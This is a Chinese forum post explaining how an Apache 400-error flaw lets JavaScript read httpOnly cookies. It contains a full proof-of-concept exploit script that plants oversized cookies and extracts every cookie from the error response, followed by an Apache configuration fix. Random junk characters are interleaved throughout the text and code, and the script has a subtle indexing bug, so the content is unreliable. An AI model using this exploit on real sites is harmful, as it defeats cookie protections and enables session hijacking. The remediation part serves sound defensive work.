很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。3 b5 t H$ q& M4 G9 p# }* Y
6 F" P, ?) f- V3 `
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:1 p0 u6 u0 Z* d4 P) M2 B7 v) q3 s) {
: k& S; |* ~! c3 A4 ?+ z# n8 v2 |
// http://www.exploit-db.com/exploits/18442/$ h/ }" O( o9 C( p; m
function setCookies (good) {
) _6 i- _ R9 N8 h$ \3 r ^// Construct string for cookie value" U# ?3 J, }, v& \" y% ?* q
var str = "";
: n8 }( V4 o* Z2 t6 X; P0 hfor (var i=0; i< 819; i++) {: i- p+ f1 I; G: O8 q5 y' E
str += "x";
+ d' z0 q2 f& r3 a$ J}
0 M5 G$ m* |/ v// Set cookies. p, a# i6 ]( Q% _, Z
for (i = 0; i < 10; i++) {
1 d7 k- S0 m& o2 n// Expire evil cookie
3 k5 k' y5 B+ l7 e9 Hif (good) {
' E- |/ V/ x! ?" R6 F6 ~6 _6 xvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ d9 |6 n( R! j6 z
}; m9 H- f0 k- Q
// Set evil cookie, v* V, H5 Z1 j
else {
' {3 g+ }8 v, O' g% \var cookie = "xss"+i+"="+str+";path=/";# j2 G8 Z; l0 ^* U- S
}3 ?! u, W- a1 C4 h
document.cookie = cookie;
0 R/ V2 X. W, o2 K0 \" z3 E$ A( X}, W7 S8 ]1 f1 l R
}. e1 I$ |+ C* @' \5 Y
function makeRequest() {
D( R) N$ e: x XsetCookies();' ?' k) X3 |6 Y. c3 i1 P
function parseCookies () {* A+ w3 T; _7 q9 R$ k
var cookie_dict = {};
0 Q8 U. }/ g2 L& y0 C8 }// Only react on 400 status
8 q3 {# ^" I" @" `6 F5 h! e# Eif (xhr.readyState === 4 && xhr.status === 400) {
3 P# U8 M; X1 ~; Y/ N& y// Replace newlines and match <pre> content$ j# J7 B3 P) x" y+ t, g
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
- ]% v% R( W/ \/ P8 Qif (content.length) {' A% V- M; W/ W0 D
// Remove Cookie: prefix
I9 u8 I1 J! Y( C' E+ m9 {content = content[1].replace("Cookie: ", "");
8 q+ @# C6 t- K: c$ a7 ~var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
* h; ^. u, U4 f/ w) a) s H// Add cookies to object2 z; G- `4 j* ^% `* H6 I4 O: d
for (var i=0; i<cookies.length; i++) {
! i4 `% R5 n; p* t! m1 rvar s_c = cookies.split('=',2);% r2 G E: y8 I6 E& A% U
cookie_dict[s_c[0]] = s_c[1];
3 y8 K# F0 i, h5 n& d/ u; S0 N( k}% I7 Y: I* f$ c, G
}" U( y" V) q( z* y* h9 `- W
// Unset malicious cookies2 T% a! O% Z9 ~; U" \" U9 }
setCookies(true);
9 C- u) v! R, \/ g( n8 x$ v7 {alert(JSON.stringify(cookie_dict));
7 f5 i5 E1 l3 R}! o; h: H Y `7 f, k* A
}& t/ O1 _3 J" i( t- `' h5 {- f
// Make XHR request
, G) s: o7 X1 Q! ^& Z( @- R$ nvar xhr = new XMLHttpRequest();& Z. M! b* C& q
xhr.onreadystatechange = parseCookies;8 x$ E0 a/ f8 C1 A: J& S
xhr.open("GET", "/", true);
" K/ z+ d& c" G/ \) u! _ Lxhr.send(null);
6 I" p# U* G3 O/ c2 c}
1 u' H3 ^( I0 Q2 P2 C6 LmakeRequest();" a# O1 X1 _" O" {$ L- b5 G
( ~+ z, y4 V0 e. M2 g* I i9 ]& k9 X
你就能看见华丽丽的400错误包含着cookie信息。
& t5 \4 }0 G. I
4 j' e' f7 {" F+ V; R4 y( B下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#% W1 l6 k; [# h1 l6 ?
! w- H6 ^$ S+ @" K, L修复方案:5 w$ J; @/ ?& P: l( w. i; M
6 b, H# L: `: z7 N) A6 R* l: FApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
2 }0 J+ e* }& j+ P) z
$ V* E- g8 h: |, g# |1 X9 k' W. _In the event of a problem or error, Apachecan be configured to do one of four things,
6 o$ ?$ y, F; h" L$ Z+ m' L7 H3 z' @& e5 a3 s, D7 ~
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
7 T& b' y; p1 D6 g3 q, B8 L8 b2. output acustomized message输出一段信息( U" `+ d0 |- T
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
/ O5 d+ R" p$ O5 l4. redirect to an external URL to handle theproblem/error转向一个外部URL
R# B" m* Y9 L5 L5 H. o
& v# L g w0 o* W" p6 s经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
$ r" O9 S" O! s) T6 }8 Z
% n3 q2 j/ ] X- \3 X3 t- B6 mApache配置:( q4 L& s8 Y; p
+ X( h) n) U2 J/ z& y8 q
ErrorDocument400 " security test"
4 l" f) @& b3 U4 A- W# D
& ^3 h: b* k6 |& |' f当然,升级apache到最新也可:)。
5 r3 l: `, ^# Y* l; {, p9 r+ v H2 a5 D
参考:http://httpd.apache.org/security/vulnerabilities_22.html
( H/ n8 D( J- e5 J z7 f O1 F, J7 I$ `) k
: E `3 i& h5 {( I4 i |
发表于 2013-4-19 19:15:43
收藏
支持
反对